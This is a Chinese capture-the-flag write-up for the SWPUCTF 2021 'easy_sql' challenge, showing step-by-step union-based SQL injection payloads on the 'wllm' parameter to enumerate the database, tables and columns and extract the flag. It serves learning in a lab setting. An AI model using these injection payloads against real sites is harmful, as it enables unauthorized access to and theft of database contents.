[NSSCTF]-Web:[SWPUCTF 2021 新生赛]easy_sql解析

查看网页

有提示,参数是wllm,并且要我们输入点东西

所以,我们尝试以get方式传入

有回显,但似乎没啥用

从上图看应该是字符型漏洞,单引号字符注入

先查看字段数

复制代码
/?wllm=2'order by 3--+

没回显

报错了,说明字段数是3

然后查看回显点

复制代码
/?wllm=2'union select 1,2,3--+

注意,这里需要把wllm设置为不为1的数(就是让他查不到数据就行,因为wllm=1查得到数据),不然它只会输出wllm=1查询到的数据。

然后查看数据库名称

复制代码
/?wllm=2'union select 1,2,database()--+

得到数据库名称就可以按顺序数据库-表-列来找flag了

复制代码
/?wllm=2'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+
复制代码
?wllm=2'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+
复制代码
/?wllm=2'union select 1,2,flag from test_tb--+
相关推荐
二哈喇子!17 分钟前
MySQL数据更新操作
数据库·sql
二哈喇子!18 分钟前
MySQL命令行导入数据库
数据库·sql·mysql·vs code
学习中的DGR2 小时前
[GXYCTF2019]Ping Ping Ping 1和[SUCTF 2019]EasySQL 1新手解题过程
sql·安全·web安全·网络安全·php
上海云盾商务经理杨杨2 小时前
付费网站的攻防战:2026年,如何破解并抵御爬虫攻击
网络·安全
emma羊羊2 小时前
【wordpress-wpdiscuz-rce】
网络·web安全·wordpress
夜勤月2 小时前
给AI装上“文件之手”:深入解析MCP文件系统服务的安全沙箱与读写实践
人工智能·安全
Sombra_Olivia3 小时前
Ubuntu22.04 安装Docker Vulhub遇到的问题
web安全·docker·vulhub
飞函安全3 小时前
飞函:为政企沟通加上“安全锁“
安全
weixin_462446234 小时前
使用 jsr:@langchain/pyodide-sandbox 构建 Python 安全沙箱(完整入门教程)
python·安全·langchain·sandbox
猿码优创4 小时前
过滤境外ip和域名访问的解决方案
网络·网络协议·tcp/ip·安全·阿里云